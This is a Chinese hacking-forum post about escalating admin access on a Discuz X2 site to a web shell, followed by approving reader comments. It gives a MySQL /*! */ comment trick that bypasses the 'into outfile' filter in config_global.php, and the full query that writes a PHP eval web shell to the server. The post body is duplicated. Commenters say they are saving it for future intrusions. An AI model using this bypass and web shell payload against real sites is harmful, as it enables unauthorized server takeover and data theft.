Discuz X2 后台getshell 鸡肋
作者:yesu
最近帮朋友看了一个站,DZx2的,拿到了创始人都没办法getshell
百度无果,自己本地架设了一下
1,当mysql是root时
站长---数据库---升级
尝试
select '1' into outfile 'E:\2.txt'
会提示
[Type] 查询语句安全威胁
[Query] select '1' into outfile 'E:\2.txt'
为什么会这样呢?
\config\config_global.php中
限制了into outfile函数
尝试绕过
/*!select*/ '1' /*!into outfile*/ 'E:\3.txt'
Discuz! 数据结构升级成功,影响的记录行数 1
如果要导出一句话,即
/*!select*/ '<?php @eval($_POST[cmd]);?>' /*!into outfile*/ 'E:\3.php'
注意:一句话密码不要有引号
最近帮朋友看了一个站,DZx2的,拿到了创始人都没办法getshell
百度无果,自己本地架设了一下
1,当mysql是root时
站长---数据库---升级
尝试
select '1' into outfile 'E:\2.txt'
会提示
[Type] 查询语句安全威胁
[Query] select '1' into outfile 'E:\2.txt'
为什么会这样呢?
\config\config_global.php中
限制了into outfile函数
尝试绕过
/*!select*/ '1' /*!into outfile*/ 'E:\3.txt'
Discuz! 数据结构升级成功,影响的记录行数 1
如果要导出一句话,即
/*!select*/ '<?php @eval($_POST[cmd]);?>' /*!into outfile*/ 'E:\3.php'
注意:一句话密码不要有引号
关于作者
评论35次
楼主大赞..正好用的上
root还是会有机会有的。收藏下~~
感谢分享
好多站都用x2.5了 2.0的很少
。。。妹啊。。。站库分离的啊。
root权限的还是有不少的,不鸡肋
创始人拿不到
2我也不知道啊
耶稣哥哥,还有个2呢?不是root的怎么搞啊
你知道的太多了。。
确实有些鸡肋,不过也算是一种思路,,感谢分享
不错,不过运气比较好呀!!
总算是有一种方法了 相信迟早用的上
的确鸡肋在root了
先mark吧,以后可能会遇到root
mark,很好的方法
总归是一种方法 手下了
留待有用!!
要root权限
root还是有很多的,